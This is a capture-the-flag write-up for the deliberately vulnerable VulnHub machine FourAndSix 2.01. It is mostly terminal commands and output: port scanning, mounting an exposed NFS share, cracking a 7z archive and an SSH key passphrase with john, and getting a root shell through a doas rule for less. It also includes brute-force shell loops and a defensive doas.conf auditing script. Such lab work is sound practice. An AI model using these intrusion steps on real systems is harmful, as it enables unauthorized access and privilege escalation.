FOURANDSIX: 2.01
https://www.vulnhub.com/entry/fourandsix-201,266/
Host discovery
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:18:09]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.3
Host is up (0.011s latency).
nmap scan
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:18:14]
$ sudo nmap --min-rate 10000 -p- 192.168.54.3
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
649/tcp open cadview-3d
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:22:13]
$ sudo nmap -sT -sV -O -p22,111,649 192.168.54.3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
649/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:87:CE:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.4
Network Distance: 1 hop
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [14:22:58]
$ sudo nmap -sU -p22,111,649 192.168.54.3
PORT STATE SERVICE
22/udp closed ssh
111/udp open rpcbind
649/udp closed cadview-3d
MAC Address: 00:0C:29:87:CE:4E (VMware)
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:15:40]
$ sudo nmap -sC -sV -oN nmapScriptScan.log 192.168.54.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 09:15 CST
Nmap scan report for 192.168.54.3
Host is up (0.00061s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 ef3b2ecf40199ebb231eaa24a1094ed1 (RSA)
| 256 c85c8b0be1640c75c363d7b380c92fd2 (ECDSA)
|_ 256 61bc459abaa5472060132519b047cbad (ED25519)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 724/udp mountd
|_ 100005 1,3 752/tcp mountd
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:87:CE:4E (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.08 seconds
Nothing there at all, surprisingly.
NFS service
Check whether the NFS service exports any shares.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:19:39]
$ showmount -e 192.168.54.3
Export list for 192.168.54.3:
/home/user/storage (everyone)
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:25:36]
$ mkdir nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:26:15] C:32
$ sudo mount -t nfs 192.168.54.3:/home/user/storage nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:26:47]
$ cd nfsdir
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:26:56]
$ ls
backup.7z
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:29:28]
$ cp backup.7z ..
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01/nfsdir [9:29:33]
$ cd ..
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:37]
$ ls
backup.7z nfsdir nmapScriptScan.log
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:40]
$ file backup.7z
backup.7z: 7-zip archive data, version 0.4
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:44]
$ binwalk backup.7z
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 7-zip archive data, version 0.4
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:29:57]
$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.utf8,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz (906E9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
ERROR: Data Error in encrypted file. Wrong password? : hello1.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello2.png
ERROR: Data Error in encrypted file. Wrong password? : hello3.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello4.png
ERROR: Data Error in encrypted file. Wrong password? : hello5.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello6.png
ERROR: Data Error in encrypted file. Wrong password? : hello7.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello8.jpeg
ERROR: Data Error in encrypted file. Wrong password? : id_rsa
ERROR: Data Error in encrypted file. Wrong password? : id_rsa.pub
Sub items Errors: 10
Archives with Errors: 1
Sub items Errors: 10
It needs a password, so let john handle it.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:31:34] C:2
$ 7z2john backup.7z > backup.7z_hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:34:00] C:1
$ john --format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup.7z_hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate (backup.7z)
1g 0:00:00:00 DONE (2023-03-27 09:34) 1.162g/s 74.41p/s 74.41c/s 74.41C/s 123456..charlie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Check whether the extracted files have anything embedded in them.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:14]
$ ls
backup.7z hello1.jpeg hello3.jpeg hello5.jpeg hello7.jpeg id_rsa nfsdir
backup.7z_hash hello2.png hello4.png hello6.png hello8.jpeg id_rsa.pub nmapScriptScan.log
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:16]
$ file hello*.*
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:38:18]
$ binwalk hello*.*
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello1.jpeg
MD5 Checksum: 36fd4beda9c0762f4f224150cd67ab07
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello2.png
MD5 Checksum: 36e1d982cfec8d61094bb630bf36c828
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 257 x 196, 8-bit colormap, non-interlaced
263 0x107 Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello3.jpeg
MD5 Checksum: 21116e89ae3a6b52ca9a88a4d2b4aa9f
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello4.png
MD5 Checksum: 0d8a3ad296f250880dac19e670be01f2
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 206 x 244, 8-bit colormap, non-interlaced
431 0x1AF Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello5.jpeg
MD5 Checksum: 51dabdddaf964782a9871b6d98d3ffec
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello6.png
MD5 Checksum: ce9003ed057a2c2c718915aba5d71e17
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 177 x 232, 8-bit colormap, non-interlaced
296 0x128 Zlib compressed data, default compression
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello7.jpeg
MD5 Checksum: e3a266075a99ab85f9e06523dd135c0a
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-27 09:38:23
Target File: /home/yunki/vulnhub/FOURANDSIX:2.01/hello8.jpeg
MD5 Checksum: 392e26dcb3e0f9a58fa49fcdc61c5e40
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:39:27]
$ exiftool hello*.* |grep "comment"
Inspecting the public and private keys
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:39:35] C:1
$ file id_rsa id_rsa.pub
id_rsa: OpenSSH private key
id_rsa.pub: OpenSSH RSA public key
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:40:10]
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:40:39]
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2
Getting an initial foothold
Use ssh -i id_rsa user@192.168.54.3
It asks for a passphrase, surprisingly, so let john handle it again.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:41:55] C:130
$ ssh2john id_rsa > id_rsa_hash
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:42:12]
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:01 DONE (2023-03-27 09:42) 0.6896g/s 44.13p/s 44.13c/s 44.13C/s 123456..charlie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# yunki @ yunki in ~/vulnhub/FOURANDSIX:2.01 [9:42:55]
$ ssh -i id_rsa user@192.168.54.3
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
fourandsix2$ whoami
user
fourandsix2$ ip a
ksh: ip: not found
fourandsix2$ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 32768
index 3 priority 0 llprio 3
groups: lo
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
lladdr 00:0c:29:87:ce:4e
index 1 priority 0 llprio 3
groups: egress
media: Ethernet autoselect (1000baseT full-duplex,master)
status: active
inet 192.168.54.3 netmask 0xffffff00 broadcast 192.168.54.255
enc0: flags=0<>
index 2 priority 0 llprio 3
groups: enc
status: active
pflog0: flags=141<UP,RUNNING,PROMISC> mtu 33136
index 4 priority 0 llprio 3
groups: pflog
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
Privilege escalation
Since this machine is OpenBSD there is no sudo -l; the equivalent is doas, and the permissions it grants can be viewed with cat /etc/doas.conf.
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
fourandsix2$ sudo -l
ksh: sudo: not found
fourandsix2$ find / -group user -type f 2>/dev/null
/home/user/.ssh/authorized_keys
/home/user/.Xdefaults
/home/user/.cshrc
/home/user/.cvsrc
/home/user/.login
/home/user/.mailrc
/home/user/.profile
/home/user/storage/backup.7z
/var/mail/user
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
less has a v command: open the file, press v, and less launches vi to edit the current document. Since doas runs less as root, that amounts to doas handing out root editing rights; press Esc, then type :!sh, and a root shell is obtained.
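As a defensive counterpart to the rule above, here is an added Python example (not part of this writeup) that parses an OpenBSD doas.conf and flags permit rules a non-root identity can turn into root: unrestricted commands, commands with a known shell escape such as less, and the nopass/keepenv options. The list of shell-escaping commands and the tighter tail rule are assumptions of the example, not changes made on the box.

```python
import shlex

# Added example, not from the writeup. Constructed list of commands with a known
# shell escape once run as root (less/more: 'v' opens vi; vi: ':!cmd'; etc.).
SHELL_ESCAPE_CMDS = {"less", "more", "vi", "vim", "ed", "man", "ftp", "awk",
                     "find", "perl", "python", "sh", "ksh", "csh", "bash"}
RISKY_OPTS = {"nopass": "root reached without any password",
              "keepenv": "caller's environment handed to a root process"}

def parse_rule(line):
    """Parse one doas.conf line into a dict; None for blanks, comments, non-rules."""
    toks = shlex.split(line.split("#", 1)[0])
    if not toks or toks[0] not in ("permit", "deny"):
        return None
    rule = {"action": toks[0], "options": set(), **dict.fromkeys(("identity", "target", "cmd", "args"))}
    i = 1
    while i < len(toks) and toks[i] in ("nopass", "nolog", "persist", "keepenv", "setenv"):
        rule["options"].add(toks[i])
        i = toks.index("}", i) + 1 if toks[i] == "setenv" else i + 1  # skip { VAR=.. }
    rule["identity"], i = toks[i], i + 1
    if i < len(toks) and toks[i] == "as":
        rule["target"], i = toks[i + 1], i + 2
    if i < len(toks) and toks[i] == "cmd":
        rule["cmd"], i = toks[i + 1], i + 2
        if i < len(toks) and toks[i] == "args":
            rule["args"] = toks[i + 1:]
    return rule

def audit(conf_text):
    """Return [(line_no, reason)] for permit rules a non-root identity can turn into root."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        r = parse_rule(line)
        # no 'as' target means any target user, so root is still reachable
        if not r or r["action"] != "permit" or r["identity"] == "root" \
                or r["target"] not in (None, "root"):
            continue
        if r["cmd"] is None:
            findings.append((n, f"{r['identity']} may run any command as root"))
            continue
        base = r["cmd"].rsplit("/", 1)[-1]
        if base in SHELL_ESCAPE_CMDS:
            findings.append((n, f"{base} escapes to a root shell even with pinned args"))
        findings += [(n, f"{o}: {why}") for o, why in RISKY_OPTS.items() if o in r["options"]]
    return findings
# Constructed: the box's two rules, then an assumed tighter rule (tail has no shell escape).
BOX_CONF = ("permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog\n"
            "permit nopass keepenv root as root\n")
SAFER_CONF = "permit persist user as root cmd /usr/bin/tail args -n 50 /var/log/authlog\n"
print(audit(BOX_CONF), audit(SAFER_CONF))
```

Pinning args does not help when the command itself can spawn a shell; the check therefore keys on the command's basename and the options, not on the argument list.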
fourandsix2$ doas /usr/bin/less /var/log/authlog
File modified since last write.
fourandsix2# whoami
root
fourandsix2# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 32768
index 3 priority 0 llprio 3
groups: lo
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
lladdr 00:0c:29:87:ce:4e
index 1 priority 0 llprio 3
groups: egress
media: Ethernet autoselect (1000baseT full-duplex,master)
status: active
inet 192.168.54.3 netmask 0xffffff00 broadcast 192.168.54.255
enc0: flags=0<>
index 2 priority 0 llprio 3
groups: enc
status: active
pflog0: flags=141<UP,RUNNING,PROMISC> mtu 33136
index 4 priority 0 llprio 3
groups: pflog
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42